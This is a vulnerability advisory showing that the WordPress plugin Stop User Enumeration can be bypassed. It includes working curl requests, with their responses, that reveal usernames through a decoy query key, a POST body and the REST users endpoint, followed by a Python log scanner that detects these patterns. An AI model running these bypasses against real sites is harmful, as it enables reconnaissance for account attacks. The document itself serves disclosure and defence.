Stop User Enumeration does not stop user enumeration

CVSS base score: 5 (Medium)

Access vector:   Network
Complexity:      Low
Authentication:  None
Confidentiality: Partial
Integrity:       None
Availability:    None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Vulnerability

Traditionally user enumeration of a WordPress site is done by making a series of requests to /?author=1 /?author=2 /?author=3 and so on (a similar effect can be achieved using POST requests too). WordPress 4.7 introduced a REST API endpoint to list all users.

This plugin attempts to block requests that carry an author parameter, but the check can be bypassed, and it makes no attempt to block requests to the REST API users endpoint.

Proof of concept

There are three ways to bypass this plugin’s protections.

A GET request:

$ curl -i -s 'http://localhost/?wp-comments-post&author=1'
HTTP/1.1 301 Moved Permanently
Date: Fri, 23 Dec 2016 15:38:02 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.13
Location: http://localhost/author/tomdxw/?wp-comments-post
Content-Length: 0
Content-Type: text/html; charset=UTF-8

A POST request:

$ curl -s http://localhost/?wp-comments-post -d author=1 | grep '<title'
	<title>tomdxw – WP Test</title>

The REST API (new in WordPress 4.7):

$ curl -s http://localhost/wp-json/wp/v2/users
[{"id":1,"name":"tomdxw","url":"","description":"","link":"http:\/\/localhost\/author\/tomdxw\/","slug":"tomdxw","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/localhost\/wp-json\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/localhost\/wp-json\/wp\/v2\/users"}]}}]
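The following is an added detection example, not part of the advisory and not code from the plugin: it scans web server access-log lines for the three enumeration patterns above, flagging any request whose query string contains an author parameter (whatever other keys, such as wp-comments-post, accompany it) and any request to the WordPress 4.7 REST users endpoint, then summarises suspects per client IP. The log lines are constructed for the example; the log format, the IP addresses and the threshold of three distinct author IDs are assumptions. POST bodies are not recorded in a standard access log, so the POST variant is only visible here when the author parameter is placed in the URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache combined format (not from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Dec/2016:15:38:02 +0000] "GET /?wp-comments-post&author=1 HTTP/1.1" 301 0 "-" "curl/7.50.1"
10.0.0.5 - - [23/Dec/2016:15:38:03 +0000] "GET /?wp-comments-post&author=2 HTTP/1.1" 301 0 "-" "curl/7.50.1"
10.0.0.5 - - [23/Dec/2016:15:38:04 +0000] "GET /?author=3 HTTP/1.1" 301 0 "-" "curl/7.50.1"
10.0.0.5 - - [23/Dec/2016:15:38:05 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "curl/7.50.1"
10.0.0.7 - - [23/Dec/2016:15:39:00 +0000] "GET /2016/12/hello-world/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.7 - - [23/Dec/2016:15:39:05 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# The REST users collection and single-user resources under the wp/v2 namespace.
USERS_ENDPOINT_RE = re.compile(r'^/wp-json/wp/v2/users(?:/\d+)?/?$')


def classify(target):
    """Classify one request target.

    Returns ('author-param', <author value>) when the query string carries an
    author key regardless of any other keys, ('rest-users', <path>) for the REST
    users endpoint, or None for anything else.
    """
    parts = urlsplit(target)
    # keep_blank_values so a bare key such as `wp-comments-post` is retained,
    # which makes the decoy key visible in the parsed query for later review.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if 'author' in qs:
        return ('author-param', qs['author'][0])
    if USERS_ENDPOINT_RE.match(parts.path):
        return ('rest-users', parts.path)
    return None


def scan(log_text):
    """Return {client_ip: [(tag, detail), ...]} for every flagged request."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify(m['target'])
        if result is None:
            continue
        hits.setdefault(m['ip'], []).append(result)
    return hits


def suspects(hits, min_distinct_authors=3):
    """Reduce raw hits to clients worth alerting on.

    A client is reported when it touched the REST users endpoint at all, or
    probed at least `min_distinct_authors` different author values (the
    sequential /?author=N pattern). The threshold is an assumption.
    """
    report = {}
    for ip, events in hits.items():
        authors = {detail for tag, detail in events if tag == 'author-param'}
        rest = any(tag == 'rest-users' for tag, _ in events)
        if rest or len(authors) >= min_distinct_authors:
            report[ip] = {'author_ids': sorted(authors), 'rest_users': rest}
    return report


if __name__ == '__main__':
    for ip, info in suspects(scan(SAMPLE_LOG)).items():
        print(ip, info)
```

Because the check keys on the presence of the author parameter rather than on the whole query string, the wp-comments-post decoy in the first proof of concept does not hide the request; the same classification applies to any other extra keys an enumeration tool might add.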

Mitigation/further actions

Upgrade to version 1.3.5 or later.